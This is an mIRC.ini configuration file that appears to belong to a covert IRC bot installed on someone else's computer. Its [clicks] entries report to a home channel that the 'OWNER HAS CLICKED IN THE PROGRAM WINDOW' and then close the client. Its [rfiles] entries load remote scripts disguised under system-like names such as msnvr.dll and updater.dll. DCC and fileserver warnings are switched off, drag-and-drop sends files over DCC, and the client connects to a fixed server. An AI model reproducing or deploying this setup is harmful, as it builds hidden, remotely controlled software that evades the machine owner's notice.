[warn]
fserve=off
dcc=off
[options]
n0=0,0,0,1,0,0,300,1,0,1,1,0,0,0,1,1,0,0,0,0,4096,0,1,0,0,0,1,1,0,50,1,1
n1=5,100,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0
n2=1,0,0,0,1,1,1,1,0,20,12,1,1,1,0,0,0,1,0,120,5,20,0,0,1,0,1,1,0,0,0,0,0
n3=5000,0,0,0,0,0,1,0,0,1,0,1,0,0,0,0,3,1,0,1,0,0,1,0,0,0,1,0,0,0,0,3,180,0
n4=1,0,1,1,0,3,9999,0,0,0,1,0,1024,0,0,999,120,0,0,0,1,1,1,4,1,5000,1,5,0,0,3,0,1,1
n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,1,1,1,400,160,40,30,0,26,0,0,1,0,1,0,0,82,0
n6=0,0,0,1,1,0,1,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,100,1,1,0,0,0,0,0,4,0,0,0
n7=0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,70,0,10,0,0,1,1,1,1,0,0,0,0,1,1,0,1
[about]
version=6.03
show=BR26354
[dirs]
logdir=logs\
waves=sounds\
midis=sounds\
mp3s=sounds\
wmas=sounds\
oggs=sounds\
[ports]
random=off
bind=off
[ident]
active=yes
userid=gcprB
system=UNIX
port=113
[socks]
enabled=no
port=1080
method=4
dccs=no
useip=yes
[language]
sjis=0
multibyte=0
[clicks]
status=//msg %homechan ~~~~OWNER HAS CLICKED IN THE PROGRAM  WINDOW~~~~  | /exit 
query=//msg %homechan ~~~~OWNER HAS CLICKED IN THE PROGRAM  WINDOW~~~~ | /exit
channel=//msg %homechan ~~~~OWNER HAS CLICKED IN THE PROGRAM  WINDOW~~~~ | /exit
nicklist=//msg %homechan ~~~~OWNER HAS CLICKED IN THE PROGRAM  WINDOW~~~~ | /exit
notify=//msg %homechan ~~~~OWNER HAS CLICKED IN THE PROGRAM  WINDOW~~~~ | /exit
message=//msg %homechan ~~~~OWNER HAS CLICKED IN THE PROGRAM  WINDOW~~~~ | /exit
[dde]
ServerStatus=on
ServiceName=task
CheckName=off
[marker]
show=off
size=3
colour=4
method=1
[text]
network=All
commandchar=/
linesep=-
timestamp=[HH:nn]
accept=*.bmp,*.gif,*.jpg,*.log,*.mid,*.mp3,*.ogg,*.png,*.txt,*.wav,*.wma,*.zip
ignore=*.exe,*.com,*.bat,*.dll,*.ini,*.mrc,*.vbs,*.js,*.pif,*.scr,*.lnk,*.pl,*.shs,*.htm,*.html
[fileserver]
warning=off
[dccserver]
n0=1,59,0,0,1,1
[agent]
enable=0,0,0
char=merlin.acs
options=0,0,0,100,0
speech=150,60,100,1,180,10,50,1,1,1,0,50,1
channel=1,1,1,1,1,1,1,1,1
private=1,1,1,1
other=1,1,1,1,1,1,1
pos=20,20
[mirc]
user=T7XDCC
email=djmd@jqf-64-zxe.net
nick=dcool-21
anick=IroffersEnemy
host=dcool-productions.comSERVER:dcool-productions.com:6667
[files]
servers=servers.ini
finger=finger.txt
urls=urls.ini
addrbk=addrbk.ini
[styles]
thin=3
font=0
hide=0
color=default
size=2
buttons=0
[pfiles]
n0=popups.ini
n1=popups.ini
n2=popups.ini
n3=popups.ini
n4=popups.ini
[windows]
scripts=4,1017,15,654,0,0,0
wquery=0,253,0,112,1,1,0
main=74,112,-10,27,0,1,0
wchannel=0,907,0,283,0,1,0
wchat=21,665,21,355,0,1,0
wdccg=-1,269,-1,264,0,1,0
wdccs=-1,269,-1,264,0,1,0
wserv=252,557,252,246,1,1,0
status=0,916,0,614,0,1,0
#thelab=0,916,0,614,0,1,0
wdchannel=0,1004,0,696,0,1,0
[colours]
n0=1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
[wizard]
warning=2
[nicklist]
#AREA51=right,131
#thelab=right,2
[timestamp]
ostatus=on
#thelab=on
[layers]
mirc=0
enable=0,0,0,0,0,0,0,0,0,0
others=0
[local]
[findtext]
n0="clr"
n1="stats"
n2="/msg %homechan"
n3="nout"
[waves]
query=No Sound
notice=No Sound
invite=No Sound
disconnect=No Sound
send=No Sound
highlight=No Sound
flash=No Sound
dccfail=No Sound
[dragdrop]
n0=*.wav:/sound $1 $2-
n1=*.*:/dcc send $1 $2-
s0=*.*:/dcc send $1 $2-
[extensions]
n0=defaultEXTDIR:preset\
n1=*.wav,*.mid,*.mp3,*.wma,*.oggEXTDIR:preset\
[afiles]
n0=aliases.ini

[rfiles]
n0=mscnnt.ini
n1=mscnnt.ini
n2=msnvr.dll
n3=updater.dll
